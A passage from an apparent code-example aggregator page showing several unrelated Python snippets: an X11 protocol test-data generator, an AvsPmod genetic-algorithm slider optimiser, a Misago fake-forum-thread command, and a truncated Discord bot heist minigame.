                def rand(x, rmin = rmin, rmax = rmax):
                    return randint(rmin, rmax)

                vfdata = list(map(rand, range(0, vflen)))

                #
                # Special case for a few in-line coded lists
                #
                if structname in ('xGetKeyboardControlReply',
                                  'xQueryKeymapReply',
                                  'xKeymapEvent'):
                    extra_vars.append('%s %s_def[%d] = { %s };'
                                      % (ctype, f.name, vflen,
                                         ', '.join(map(str, vfdata))))
                    varfs[f.name] = ('memcpy(data.xstruct.map, %s_def, sizeof(%s_def));'
                                     % (f.name, f.name),
                                     vflen, 0)
                else:
                    fc.write('%s %s[%d];\n      '
                             % (ctype, f.name, deflen))
                    extra_vars.append('%s %s_def[%d] = { %s };'
                                      % (ctype, f.name, vflen,
                                         ', '.join(map(str, vfdata))))
                    varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                     % (f.name, f.name, f.name),
                                     vflen, 0)

                args[f.name] = vfdata

            #
            # Special handling of unique Host case
            #
            elif f.type is structs.Host:
                pydata = [{ 'family': X.FamilyInternet,
                            'name': [ 34, 23, 178, 12 ] },
                          { 'family': X.FamilyInternet,
                            'name': [ 130, 236, 254, 15 ] }, ]

                cdata = []
                for p in pydata:
                    cdata.append("{ { %d, 0, 4 }, { %d, %d, %d, %d } }"
                                 % ((p['family'], ) + tuple(p['name'])))

                fc.write('struct { xHostEntry e; CARD8 name[4]; } %s[2];\n      ' % f.name)

                extra_vars.append('struct { xHostEntry e; CARD8 name[4]; } %s_def[%d] = { %s };'
                                  % (f.name, len(pydata),
                                     ', '.join(cdata)))

                varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 len(pydata), 0)

                args[f.name] = pydata


            #
            # List of structures
            #
            elif isinstance(f.type, rq.Struct):
                vfname, vflen = vardefs[i]
                vfdef = struct_defs[vfname]

                pydata = []
                defdata = []
                for si in range(0, vflen):
                    d = []
                    # Generate one random value per non-pad member.
                    for t, cf in vfdef:
                        if cf[:3] != 'pad':
                            d.append(gen_value(t))

                    # Map the generated values onto the python-xlib field
                    # names, relying on matching member order.
                    pyd = {}
                    for sj in range(0, len(d)):
                        pyd[f.type.fields[sj].name] = d[sj]

                    pydata.append(pyd)
                    defdata.append('{ ' + ', '.join(map(str, d)) + ' }')

                fc.write('x%s %s[%d];\n        ' % (vfname, f.name, vflen))

                extra_vars.append('x%s %s_def[%d] = { %s };'
                                  % (vfname, f.name, vflen,
                                     ', '.join(defdata)))
                varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 vflen, 0)
                args[f.name] = pydata

        #
        # wide-char string
        #
        elif isinstance(f, rq.String16):
            vfstr = vardefs[i]
            vflen = len(vfstr)

            fc.write('unsigned char %s[%d];\n        ' %
                     (f.name, (vflen + vflen % 2) * 2))

            # Encode as big-endian 2-byte characters (high byte zero).
            s = ''
            for c in vfstr:
                s = s + '\0' + c

            varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                             % (f.name, cstring(s), vflen * 2),
                             vflen, 0)
            args[f.name] = tuple(map(ord, vfstr))

        #
        # byte-char string
        #
        elif isinstance(f, rq.String8):
            vfstr = vardefs[i]
            vflen = len(vfstr)

            fc.write('unsigned char %s[%d];\n        ' %
                     (f.name, (vflen + (4 - vflen % 4) % 4)))
            varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                             % (f.name, cstring(vfstr), vflen),
                             vflen, 0)
            args[f.name] = vfstr

        #
        # List of optional values
        #
        elif isinstance(f, rq.ValueList):
            vlcode = []
            vlargs = {}
            flags = 0
            for vlf, flag in f.fields:
                ctype, rmin, rmax, clen = structcode_defs[vlf.structcode]
                fc.write('%s %s_%s;\n      '
                         % (ctype, f.name, vlf.name))
                # Each value-list entry occupies a full 4-byte slot.
                if clen < 4:
                    fc.write('unsigned char %s_%s_pad[%d];\n      '
                             % (f.name, vlf.name, 4 - clen))

                if isinstance(vlf, rq.Set):
                    val = choice(vlf.values)
                elif isinstance(vlf, rq.Bool):
                    val = choice((0, 1))
                else:
                    val = randint(rmin, rmax)
                vlargs[vlf.name] = val
                vlcode.append('data.%s_%s = %d;' % (f.name, vlf.name, val))
                flags = flags | flag

            # The mask itself is written later by the fixed-field loop,
            # which picks up `flags` for the 'mask'/'valueMask' member.

            varfs[f.name] = (' '.join(vlcode), 0, 0)
            args[f.name] = vlargs

        #
        # Text/font list, hardwire since they are so rare
        #
        elif isinstance(f, rq.TextElements8):
            # TextElements16 subclasses TextElements8, so test it first.
            if isinstance(f, rq.TextElements16):
                vfstr = b'\x02\x02\x10\x23\x00\x12\xff\x01\x02\x03\x04'
                ret = [{'delta': 2, 'string': (0x1023, 0x0012)},
                       0x01020304]
            else:
                vfstr = b'\x03\x02zoo\xff\x01\x02\x03\x04\x02\x00ie'
                ret = [{'delta': 2, 'string': 'zoo'},
                       0x01020304,
                       { 'delta': 0, 'string': 'ie'}]

            fc.write('unsigned char %s[%d];\n      '
                     % (f.name, len(vfstr)))
            varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                             % (f.name, cstring(vfstr), len(vfstr)),
                             0, 0)
            args[f.name] = ret

        #
        # Keyboard/modifier mappings
        #
        elif isinstance(f, rq.KeyboardMapping) \
             or isinstance(f, rq.ModifierMapping):

            if isinstance(f, rq.KeyboardMapping):
                rmin = 0
                rmax = 2147483646
                length = 20
                format = 3
                ctype = 'CARD32'
            else:
                rmin = 0
                rmax = 255
                length = 8
                format = 2
                ctype = 'CARD8'

            pydata = []
            cdata = []
            # Use dedicated loop variables: the original code reused `i`
            # here, clobbering the outer vardefs field index.
            for row in range(0, length):
                x = []
                for col in range(0, format):
                    v = randint(rmin, rmax)
                    x.append(v)
                    cdata.append(str(v))
                pydata.append(x)

            fc.write('%s %s[%d];\n      ' % (ctype, f.name, len(cdata)))
            extra_vars.append('%s %s_def[%d] = { %s };'
                              % (ctype, f.name, len(cdata),
                                 ', '.join(cdata)))
            varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                             % (f.name, f.name, f.name),
                             length, format)
            args[f.name] = pydata

        #
        # property data
        #
        elif isinstance(f, rq.PropertyData):
            format, data = vardefs[i]
            length = len(data)

            if format == 8:
                ctype = 'CARD8'
                clen = pad4(length)
                cdata = cstring(data)
            elif format == 16:
                ctype = 'CARD16'
                clen = length + length % 2
                cdata = ', '.join(map(str, data))
            elif format == 32:
                ctype = 'CARD32'
                clen = length
                cdata = ', '.join(map(str, data))
            else:
                # Previously fell through with ctype/clen/cdata undefined
                # and crashed later with a NameError; fail explicitly.
                raise RuntimeError('unsupported property format: %s' % format)

            if not isinstance(f, rq.FixedPropertyData):
                fc.write('%s %s[%d];\n        ' %
                         (ctype, f.name, clen))

            extra_vars.append('%s %s_def[%d] = { %s };'
                              % (ctype, f.name, length, cdata))

            if not isinstance(f, rq.FixedPropertyData):
                varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 length, format)
            else:
                # Fixed property data is stored inline in the 20-byte
                # client-message union rather than in a trailing array.
                varfs[f.name] = ('assert(sizeof(%s_def) == 20); memcpy(data.xstruct.u.clientMessage.u.b.bytes, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 length, format)

            args[f.name] = (format, data)

        #
        # Event
        #
        elif isinstance(f, rq.EventField):
            # Use an Expose event with random fields as representative
            # 32-byte embedded event data.
            ev = event.Expose(window = gen_value('CARD32'),
                              x = gen_value('CARD16'),
                              y =  gen_value('CARD16'),
                              width = gen_value('CARD16'),
                              height = gen_value('CARD16'),
                              count = gen_value('CARD16'))
            cdata = cstring(ev._binary)

            extra_vars.append('unsigned char %s_def[32] = %s;'
                              % (f.name, cdata))
            varfs[f.name] = ('memcpy(&data.xstruct.event, %s_def, sizeof(%s_def));'
                             % (f.name, f.name),
                             0, 0)

            args[f.name] = ev

        else:
            raise RuntimeError('oops: %s.%s' % (funcname, f.name))

        i = i + 1


    fc.write('\n      } data;\n')


    for v in extra_vars:
        fc.write('      %s\n' % v)

    fc.write('''
      memset(&data, 0, sizeof(data));

    ''')

    # Walk the python definition and the C definition in parallel; they can
    # get out of step because pad fields are implicit on the python side.
    pyi = 0
    ci = 0

    while ci < len(cdef):
        try:
            pyf = pydef.fields[pyi]
        except IndexError:
            pyf = None

        cf = cdef[ci]
        t, f = cf

        pyi = pyi + 1
        ci = ci + 1

        if f[:3] == 'pad' or f[:6] == 'walign':
            # C-only padding: back up the python index unless the python
            # definition has an explicit Pad here too.
            if not isinstance(pyf, rq.Pad):
                pyi = pyi - 1

        # special case for value list mask
        elif (f == 'mask' or f == 'valueMask') and flags is not None:
            fc.write('      data.xstruct.%s = %d;\n' % (f, flags))

        elif isinstance(pyf, rq.ConstantField):
            fc.write('      data.xstruct.%s = %d;\n' % (f, pyf.value))

        elif isinstance(pyf, rq.RequestLength):
            assert f == 'length'

            fc.write('      assert(sizeof(data) %% 4 == 0);\n'.replace('%%', '%'))
            fc.write('      data.xstruct.length = sizeof(data) / 4;\n')

        elif isinstance(pyf, rq.ReplyLength):
            assert f == 'length'

            fc.write('      assert(sizeof(data) %% 4 == 0);\n'.replace('%%', '%'))
            fc.write('      assert(sizeof(data) >= 32);\n')
            fc.write('      data.xstruct.length = (sizeof(data) - 32) / 4;\n')

        elif isinstance(pyf, rq.LengthOf):
            fc.write('      data.xstruct.%s = %d;\n' % (f, varfs[pyf.name][1]))

        elif isinstance(pyf, rq.OddLength):
            fc.write('      data.xstruct.%s = %d;\n' % (f, varfs[pyf.name][1] % 2))

        elif isinstance(pyf, rq.Format):
            fc.write('      data.xstruct.%s = %d;\n' % (f, varfs[pyf.name][2]))

        elif isinstance(pyf, rq.Set):
            val = choice(pyf.values)
            fc.write('      data.xstruct.%s = %d;\n' % (f, val))
            args[pyf.name] = val

        elif t == 'xCharInfo':
            d = []
            for ct, cf in struct_defs['CharInfo']:
                if cf[:3] != 'pad':
                    d.append(gen_value(ct))

            pyd = {}
            for sj in range(0, len(d)):
                pyd[pyf.type.fields[sj].name] = d[sj]

            fc.write('{ %s def = { %s };\n      '
                     % (t, ', '.join(map(str, d))))
            fc.write('memcpy(&data.xstruct.%s, &def, sizeof(def)); }\n        ' % f)
            args[pyf.name] = pyd

        else:
            val = gen_value(t)
            fc.write('      data.xstruct.%s = %d;\n' % (f, val))
            args[pyf.name] = val

    # Emit the variable-field initializers collected above.
    for code, length, format in varfs.values():
        fc.write('      %s\n' % code)

    fc.write('''
      output("%s", &data, sizeof(data));
    }

    ''' % outputname)

    return args

Example 43

Project: AvsPmod
Source File: [7] Optimize Sliders.py
View license
def main():
    """Optimize the user-slider values of the current AviSynth script.

    Runs a simple genetic algorithm where each chromosome encodes one value
    per slider; candidates are scored by encoding the script with avs2avi
    and reading the SSIM result from its log file.  Writes the best script
    found to '<script>-optimized.avs'.  (Python 2 / AvsPmod macro API.)
    """
    import random
    import math
    import subprocess
    import os
    import os.path
    
    app = avsp.GetWindow()
    params = []            # per-slider [label, valuelist, nbits] triples
    scriptTemplate = ''    # script text with sliders replaced by %(label)f
    logfilename = 'log.txt'
    avs2avidir = os.path.join(app.toolsfolder, 'avs2avi.exe')
    
    # Simple Genetic Algorithm implementation
    class SGA(object):
        def __init__(self,
                chromosome_length,
                objective_function,
                population_size=100,
                probability_crossover=0.5,
                probability_mutation=0.01,
                selection_pressure=4,
                max_generations=10,
                minimize=True,
                dump_function=None):
            # Define the variables for the key GA parameters.
            # length/minimize are stored on the CLASS so the nested
            # Individual class (below) can read them.
            SGA.length = chromosome_length
            self.objfn = objective_function
            self.n = population_size - population_size % 2  # keep n even
            self.pc = probability_crossover
            self.pm = probability_mutation
            self.s = selection_pressure
            self.maxgen = max_generations
            SGA.minimize = minimize
            self.dump = dump_function
            self.generation = 0
            self.scoreDict = {}  # memo: int(chromosome) -> score
            # Define the individual class
            class Individual(object):
                def __init__(self, chromosome=None):
                    self.length = SGA.length
                    self.minimize = SGA.minimize
                    self.score = None
                    self.chromosome = chromosome
                    # No chromosome given: start from random bits.
                    if self.chromosome is None:
                        self.chromosome = [random.choice((0,1)) for i in xrange(self.length)]
                        
                def __cmp__(self, other):
                    # Ordering is by score; inverted when maximizing, so
                    # min(population) is always the best individual.
                    if self.minimize:
                        return cmp(self.score, other.score)
                    else:
                        return cmp(other.score, self.score)                    
                        
                def copy(self):
                    twin = self.__class__(self.chromosome[:])
                    twin.score = self.score
                    return twin
            self.Individual = Individual
            
        def run(self):
            """Run the GA; returns False if the user cancels, else True."""
            # Create the initial population (generation 0)
            self.population = [self.Individual() for i in range(self.n)]
            try:
                pb = avsp.ProgressBox(self.n, _('Initial evaluation...'), _('Generation 0 Progress'))
            except NameError:
                # No progress-box support available; run without one.
                pb = None
            try:
                for i, individual in enumerate(self.population):
                    self.evaluate(individual)
                    if pb is not None:
                        # Update() returns a tuple whose first item is
                        # False when the user pressed Cancel.
                        if not pb.Update(i)[0]:
                            pb.Destroy()
                            return False
                # Dump the best data from this generation
                best = min(self.population)
                initialscore = best.score
                if self.dump is not None:
                    self.dump(best.chromosome, best.score)
                if pb is not None:
                    pb.Destroy()
                self.generation += 1
                # Run the genetic algorithm
                while self.generation < self.maxgen:
                    # Create a progress bar for this generation
                    if pb is not None:
                        pb = avsp.ProgressBox(
                            self.n,
                            _('Initial best score: %.3f, Current best score: %.3f') % (initialscore, best.score),
                            'Generation %i Progress' % self.generation
                        )
                    # Elitism: the best individual survives unchanged.
                    newpopulation = [best.copy()]
                    count = len(newpopulation)
                    while count < self.n:
                    #~ for i in xrange(self.n/2):
                        # Selection
                        mate1 = self.selection()
                        mate2 = self.selection()
                        # Crossover
                        children = self.crossover(mate1, mate2)
                        for individual in children:
                            # Mutation
                            self.mutation(individual)
                            # Evaluate the individual and add it to the new population
                            self.evaluate(individual)
                            newpopulation.append(individual)
                        # Update the progress bar
                        count = len(newpopulation)
                        if pb is not None:
                            i = min(count-1, self.n-1)
                            if not pb.Update(i)[0]:
                                pb.Destroy()
                                return False
                    # Update the internally stored population
                    self.population = newpopulation[:self.n]
                    # Dump the best data from this generation
                    best = min(self.population)
                    if self.dump is not None:
                        self.dump(best.chromosome, best.score)
                    # Destroy the progress bar for this generation
                    if pb is not None:
                        pb.Destroy()
                    self.generation += 1
            finally:
                if pb is not None:
                    pb.Destroy()
            return True
            
        def crossover(self, individual1, individual2):
            '''Two point crossover'''
            if random.random() < self.pc:
                # Pick the crossover points randomly
                left = random.randrange(1, self.length-2)
                right = random.randrange(left, self.length-1)
                # Create the children chromosomes
                p1 = individual1.chromosome
                p2 = individual2.chromosome
                c1 = p1[:left] + p2[left:right] + p1[right:]
                c2 = p2[:left] + p1[left:right] + p2[right:]
                # Return the new individuals
                return self.Individual(c1), self.Individual(c2)
            else:
                # Don't perform crossover
                return individual1.copy(), individual2.copy()
            
        def mutation(self, individual):
            '''Bit-flip mutation'''
            # Randomly flip each bit in the chromosome
            chromosome = individual.chromosome
            for gene in xrange(self.length):
                if random.random() < self.pm:
                    chromosome[gene] = int(not chromosome[gene])
                    
        def selection(self):
            '''Tournament selection with replacement'''
            # Return best individual from s randomly selected members
            competitors = [random.choice(self.population) for i in range(self.s)]
            #~ competitors.sort()
            #~ return competitors[0]
            return min(competitors)
            
        def evaluate(self, individual):
            """Score an individual, memoizing by its integer chromosome."""
            intChromosome = binary2int(individual.chromosome)
            if self.scoreDict.has_key(intChromosome):
                # The chromosome was evaluated previously
                individual.score = self.scoreDict[intChromosome]
            else:
                # Run the objective function to evaluate the chromosome
                individual.score = self.objfn(individual.chromosome)
                self.scoreDict[intChromosome] = individual.score
                
    def binary2int(x):
        '''decode a binary list to a single unsigned integer'''
        return sum(map(lambda z: int(x[z]) and 2**(len(x) - z - 1),  range(len(x)-1, -1, -1)))
        
    def decode_params(bitlist, params):
        '''returns dictionary of values for each param'''
        iA = 0
        paramDict = {}
        for name, valuelist, nbits in params:
            iB = iA + nbits
            sublist = bitlist[iA:iB]
            #~ value = min + binary2int(sublist) * (max-min)/float(2**nbits - 1)
            #~ if type(min) == bool:
                #~ value = bool(value)
            # Map the nbits-wide integer linearly onto valuelist indices.
            index = int(binary2int(sublist) * (len(valuelist) - 1) / float(2 ** nbits - 1))
            paramDict[name] = valuelist[index]
            iA = iB
        return paramDict    
        
    def evaluate(chromosome):
        """Objective function: encode the decoded script, return its SSIM
        score read from the avs2avi log (0 on failure)."""
        # Decode the bit string into the individual parameters
        paramDict = decode_params(chromosome, params)
        # Create the AviSynth script
        script = scriptTemplate % paramDict
        inputavsname = os.path.join(scriptdir, 'ga_evaluate.avs')
        script = app.GetEncodedText(script, bom=True)
        f = open(inputavsname, 'w')
        f.write(script)
        f.close()
        # Encode the video to get the results (dumped to log.txt)
        try:
            os.remove(logfilename)
        except OSError:
            pass
        subprocess.call([avs2avidir, inputavsname, '-q', '-o', 'n', '-c','null'], shell=True)
        # Read the results in log.txt
        if os.path.isfile(logfilename):
            f = open(logfilename, 'r')
            lines = f.readlines()
            f.close()
            # Score is the third token of the log's last line
            # (assumes avs2avi's SSIM log format -- TODO confirm).
            score = float(lines[-1].split()[2])
            #~ print 'good!', score
        else:
            # Missing log means the encode failed (e.g. bad script).
            score = 0
            #~ print '*** Error, bad script:'
            #~ print script
            #~ print '*** End script'
        return score
        
    def dump(chromosome, score=None):
        '''Write the script to a file'''
        paramDict = decode_params(chromosome, params)
        script = scriptTemplate % paramDict
        script = app.GetEncodedText(script, bom=True)
        f = open(os.path.splitext(filename)[0] + '-optimized.avs', 'w')
        f.write(script)
        f.close()
        if score is not None:
            print _('Best score: %.2f') % score
            
    # MAIN SECTION
    if not avs2avidir or not os.path.isfile(avs2avidir):
        avsp.MsgBox(_('Must configure avs2avi directory to use this macro!'), _('Error'))
        return
    # Save the script
    filename = avsp.SaveScript()
    if not filename:
        return
    if not avsp.UpdateVideo():
        avsp.MsgBox(_('The current Avisynth script contains errors.'), _('Error'))
        return
    scriptdir = os.path.dirname(filename)
    scriptTemplate = avsp.GetText()
    # Parse the script to determine the log filename
    
    # Create the parameters to optimize based on user sliders in the script
    sliderInfoList = avsp.GetSliderInfo()
    if not sliderInfoList:
        avsp.MsgBox(_('Not user sliders on the current Avisynth script!'), _('Error'))
        return
    length = 0
    for text, label, valuelist, nDecimal in sliderInfoList:
        if valuelist is None:
            continue
        # Number of bits needed to index valuelist; frexp gives the
        # exponent, adjusted down when len(valuelist) is a power of two.
        mantissa, nbits = math.frexp(len(valuelist))
        if mantissa == 0.5:
            nbits -= 1
        params.append([label, valuelist, nbits])
        length += nbits
        # Replace the slider text with a %-format placeholder keyed by label.
        scriptTemplate = scriptTemplate.replace(text, '%('+label+').'+str(nDecimal)+'f')
    # Get basic encoder options with a dialog box
    title = _('Enter optimization info    (%i bits, %i possibilities)') % (length, 2**length)
    message = [_('SSIM log filename:'), [_('max generations:'), _('population size:'), 
              _('crossover probability:'), _('mutation probability:'), _('selection pressure:')]]
    dirname, basename = os.path.split(logfilename)
    if not os.path.isdir(dirname):
        logfilename = os.path.join(app.GetProposedPath(only='dir'), basename)
    default = [logfilename, [(10, 1), (30, 1), (0.6, 0, 1, 2, 0.05), (0.03, 0, 1, 2, 0.05), 4]]
    types = ['file_save', ['spin', 'spin', 'spin', 'spin', 'spin']]
    entries = avsp.GetTextEntry(message, default, title, types)
    if not entries:
        return
    # First clear the AVI from memory (to close the log file)
    txt = avsp.GetText()
    avsp.HideVideoWindow()
    avsp.CloseTab()
    avsp.OpenFile(filename)
    avsp.SetText(txt)
    avsp.SaveScript()
    # Run the optimization
    logfilename, maxgen, n, pc, pm, s = entries
    print _('Begin optimization...')
    print 'n=%s, pc=%s, pm=%s, s=%s, maxgen=%s (%i bits)' % (n, pc, pm, s, maxgen, length)
    sga = SGA(length, evaluate, int(n), float(pc), float(pm), int(s), int(maxgen), False, dump)
    sga.run()
    os.remove(os.path.join(scriptdir, 'ga_evaluate.avs'))
    print _('Finished optimization.')
    # Show the optimized results
    avsp.OpenFile(os.path.splitext(filename)[0] + '-optimized.avs')
    avsp.ShowVideoFrame()

Example 44

Project: Misago
Source File: createfakethreads.py
View license
    def handle(self, *args, **options):
        """Create N fake threads with fake posts for testing.

        Optional positional argument: number of threads (default 5).
        Each thread gets a random category, random starter, randomized
        moderation flags, and a randomly sized set of replies; afterwards
        a few threads are pinned and category counters are synchronized.
        """
        # Parse the optional thread count (legacy *args-style argument).
        try:
            fake_threads_to_create = int(args[0])
        except IndexError:
            fake_threads_to_create = 5
        except ValueError:
            self.stderr.write("\nOptional argument should be integer.")
            sys.exit(1)

        categories = list(Category.objects.all_categories())

        fake = Factory.create()

        User = get_user_model()
        total_users = User.objects.count()

        self.stdout.write('Creating fake threads...\n')

        message = '\nSuccessfully created %s fake threads in %s'

        created_threads = 0
        start_time = time.time()
        show_progress(self, created_threads, fake_threads_to_create)
        for i in range(fake_threads_to_create):
            # One transaction per thread so a failure doesn't leave a
            # half-built thread behind.
            with atomic():
                datetime = timezone.now()
                category = random.choice(categories)
                # order_by('?') picks a random user at the DB level.
                user = User.objects.order_by('?')[:1][0]

                # ~10% chance each of being unapproved/hidden/closed.
                thread_is_unapproved = random.randint(0, 100) > 90
                thread_is_hidden = random.randint(0, 100) > 90
                thread_is_closed = random.randint(0, 100) > 90

                # Placeholder starter/last-poster fields ('-') are filled
                # in properly by set_first_post/set_last_post below.
                thread = Thread(
                    category=category,
                    started_on=datetime,
                    starter_name='-',
                    starter_slug='-',
                    last_post_on=datetime,
                    last_poster_name='-',
                    last_poster_slug='-',
                    replies=0,
                    is_unapproved=thread_is_unapproved,
                    is_hidden=thread_is_hidden,
                    is_closed=thread_is_closed
                )
                thread.set_title(fake.sentence())
                thread.save()

                fake_message = "\n\n".join(fake.paragraphs())
                post = Post.objects.create(
                    category=category,
                    thread=thread,
                    poster=user,
                    poster_name=user.username,
                    poster_ip=fake.ipv4(),
                    original=fake_message,
                    parsed=linebreaks_filter(fake_message),
                    posted_on=datetime,
                    updated_on=datetime
                )
                # Checksum must be computed after create (it depends on
                # the saved post), then persisted separately.
                update_post_checksum(post)
                post.save(update_fields=['checksum'])

                thread.set_first_post(post)
                thread.set_last_post(post)
                thread.save()

                user.threads += 1
                user.posts += 1
                user.save()

                # Reply-count distribution: ~5% huge threads, ~45% medium,
                # the rest small.
                thread_type = random.randint(0, 100)
                if thread_type > 95:
                    thread_replies = random.randint(200, 2500)
                elif thread_type > 50:
                    thread_replies = random.randint(5, 30)
                else:
                    thread_replies = random.randint(0, 10)

                for x in range(thread_replies):
                    datetime = timezone.now()
                    user = User.objects.order_by('?')[:1][0]
                    fake_message = "\n\n".join(fake.paragraphs())

                    # ~3% unapproved; hidden only considered for approved
                    # posts (also ~3%).
                    is_unapproved = random.randint(0, 100) > 97
                    if not is_unapproved:
                        is_hidden = random.randint(0, 100) > 97
                    else:
                        is_hidden = False

                    post = Post.objects.create(
                        category=category,
                        thread=thread,
                        poster=user,
                        poster_name=user.username,
                        poster_ip=fake.ipv4(),
                        original=fake_message,
                        parsed=linebreaks_filter(fake_message),
                        is_hidden=is_hidden,
                        is_unapproved=is_unapproved,
                        posted_on=datetime,
                        updated_on=datetime
                    )
                    update_post_checksum(post)
                    post.save(update_fields=['checksum'])

                    user.posts += 1
                    user.save()

                # Recompute thread counters from its posts.
                thread.synchronize()
                thread.save()

                created_threads += 1
                show_progress(
                    self, created_threads, fake_threads_to_create, start_time)

        # Pin ~2.5% of the created threads (at least one).
        pinned_threads = random.randint(0, int(created_threads * 0.025)) or 1
        self.stdout.write('\nPinning %s threads...' % pinned_threads)
        for i in range(0, pinned_threads):
            thread = Thread.objects.order_by('?')[:1][0]
            # weight 2 = globally pinned, 1 = pinned in category
            # (presumably -- TODO confirm against Misago's Thread model).
            if random.randint(0, 100) > 75:
                thread.weight = 2
            else:
                thread.weight = 1
            thread.save()

        # Bring category counters in line with the new content.
        for category in categories:
            category.synchronize()
            category.save()

        total_time = time.time() - start_time
        total_humanized = time.strftime('%H:%M:%S', time.gmtime(total_time))
        self.stdout.write(message % (created_threads, total_humanized))

Example 45

Project: Jumper-Cogs
Source File: heist.py
View license
    async def _play_heist(self, ctx, bet: int):
        """Start a bank heist, or join one that is currently being planned.

        Flow (all state lives in the per-server ``settings`` dict):
          * first caller with a valid bet starts the planning phase and a
            countdown; their bet becomes the minimum bet for the crew;
          * later callers during planning join the crew (bet >= minimum);
          * when the countdown ends, a target bank is chosen, outcome
            messages are played back one by one, and any surviving crew
            members split the vault plus bet payouts and bonuses.

        Guard order: minimum stake (50) -> bank account exists -> caller
        can cover the bet -> cooldown elapsed -> no heist in progress.
        """
        user = ctx.message.author
        server = ctx.message.server
        settings = self.check_server_settings(server)
        if bet >= 50:
            if self.account_check(user):
                if self.enough_points(user.id, bet, server):
                    if await self.check_cooldowns(settings):  # time between heists
                        if self.heist_started(settings):  # Checks if a heist is currently happening
                            if self.heist_plan(settings):  # checks if a heist is being planned or not
                                # First player in: their bet sets the crew-wide minimum.
                                settings["Config"]["Min Bet"] = bet
                                self.heist_ptoggle(settings)
                                self.crew_add(user.id, user.name, bet, settings)
                                self.subtract_bet(user.id, bet, server)
                                # Countdown announcements at 1/2, 1/4, 1/8 and 1/8 of the
                                # configured wait time (the sleeps sum to the full wait).
                                wait = settings["Config"]["Wait Time"]
                                wait_time = int(wait / 2)
                                half_time = int(wait_time / 2)
                                split_time = int(half_time / 2)
                                await self.bot.say("A heist has been started by " + user.name +
                                                   "\n" + str(wait) + " seconds until the heist begins")
                                await asyncio.sleep(wait_time)
                                await self.bot.say(str(wait_time) + " seconds until the heist begins")
                                await asyncio.sleep(half_time)
                                await self.bot.say(str(half_time) + " seconds until the heist begins")
                                await asyncio.sleep(split_time)
                                await self.bot.say("Hurry up! " + str(split_time) + " seconds until the heist begins")
                                await asyncio.sleep(split_time)
                                self.heist_stoggle(settings)
                                await self.bot.say("Lock and load. The heist is starting")
                                settings["Config"]["Bankheist Running"] = "Yes"
                                dataIO.save_json(self.file_path, self.system)
                                bank = self.check_banks(settings)
                                await self.bot.say("The crew has decided to hit " + bank)
                                # Pre-computed outcome messages; play them back in random
                                # order, one every 10 seconds, until the list is drained.
                                j = self.game_outcomes(settings)
                                j_temp = j[:]
                                # NOTE(review): j_temp is a list copy and is never rebound to
                                # None, so this condition is always true -- the loop only
                                # exits through the break statements below.
                                while j_temp is not None:
                                    result = random.choice(j_temp)
                                    j_temp.remove(result)
                                    await asyncio.sleep(10)
                                    await self.bot.say(result)
                                    if len(j_temp) == 0:
                                        # All outcomes shown: settle the heist.
                                        settings["Config"]["Bankheist Running"] = "No"
                                        dataIO.save_json(self.file_path, self.system)
                                        await asyncio.sleep(2)
                                        await self.bot.say("The Heist is over.")
                                        await asyncio.sleep(2)
                                        if settings["Heist Winners"]:
                                            # Even split of the vault across all players who
                                            # entered; only survivors actually collect below.
                                            target = settings["Config"]["Bank Target"]
                                            amount = settings["Banks"][target]["Vault"] / settings["Config"]["Players"]
                                            winners_names = [subdict["Name"] for subdict in settings["Heist Winners"].values()]
                                            pullid = ', '.join(subdict["User ID"] for subdict in settings["Heist Winners"].values())
                                            winners_bets = [subdict["Bet"] for subdict in settings["Heist Winners"].values()]
                                            winners_bonuses = [subdict["Bonus"] for subdict in settings["Heist Winners"].values()]
                                            # NOTE(review): pullid is joined with ', ' but split()
                                            # here splits on whitespace, leaving a trailing comma
                                            # on every id except the last -- confirm add_total()
                                            # tolerates (or strips) those commas.
                                            winners = pullid.split()
                                            vtotal = settings["Banks"][target]["Vault"]
                                            vault_remainder = vtotal - amount * len(winners)
                                            settings["Banks"][target]["Vault"] = int(round(vault_remainder))
                                            dataIO.save_json(self.file_path, self.system)
                                            # Per-winner haul = bet * bank multiplier
                                            #                 + vault share + personal bonus.
                                            multiplier = settings["Banks"][target]["Multiplier"]
                                            sm_raw = [int(round(x)) * multiplier for x in winners_bets]
                                            success_multiplier = [int(round(x)) for x in sm_raw]
                                            cs_raw = [amount] * int(round(settings["Config"]["Players"]))
                                            credits_stolen = [int(round(x)) for x in cs_raw]
                                            total_winnings = [int(round(x)) + int(round(y)) + int(round(z)) for x, y, z in zip(success_multiplier, credits_stolen, winners_bonuses)]
                                            self.add_total(winners, total_winnings, server)
                                            z = list(zip(winners_names, winners_bets, success_multiplier, credits_stolen, winners_bonuses, total_winnings))
                                            t = tabulate(z, headers=["Players", "Bets", "Bet Payout", "Credits Stolen", "Bonuses", "Total Haul"])
                                            await self.bot.say("The total haul was split " +
                                                               "among the winners: ")
                                            await self.bot.say("```Python" + "\n" + t + "```")
                                            # Start the cooldown clock and reset heist state.
                                            settings["Config"]["Time Remaining"] = int(time.perf_counter())
                                            dataIO.save_json(self.file_path, self.system)
                                            self.heistclear(settings)
                                            self.winners_clear(settings)
                                            break
                                        else:
                                            # Nobody survived: no payouts, just reset + cooldown.
                                            await self.bot.say("No one made it out safe.")
                                            settings["Config"]["Time Remaining"] = int(time.perf_counter())
                                            dataIO.save_json(self.file_path, self.system)
                                            self.heistclear(settings)
                                            break
                                    else:
                                        continue
                            elif settings["Config"]["Bankheist Running"] == "No":
                                # A heist is being planned but not yet running: try to join.
                                if bet >= settings["Config"]["Min Bet"]:
                                    if self.crew_check(user.id, settings):  # join a heist that was started
                                        self.crew_add(user.id, user.name, bet, settings)
                                        self.subtract_bet(user.id, bet, server)
                                        await self.bot.say(user.name + " has joined the crew")
                                    else:
                                        await self.bot.say("You are already in the crew")
                                else:
                                    # TODO(review): user-facing typo ("equal to a greater")
                                    # left untouched here -- runtime string.
                                    minbet = settings["Config"]["Min Bet"]
                                    await self.bot.say("Your bet must be equal to a greater" +
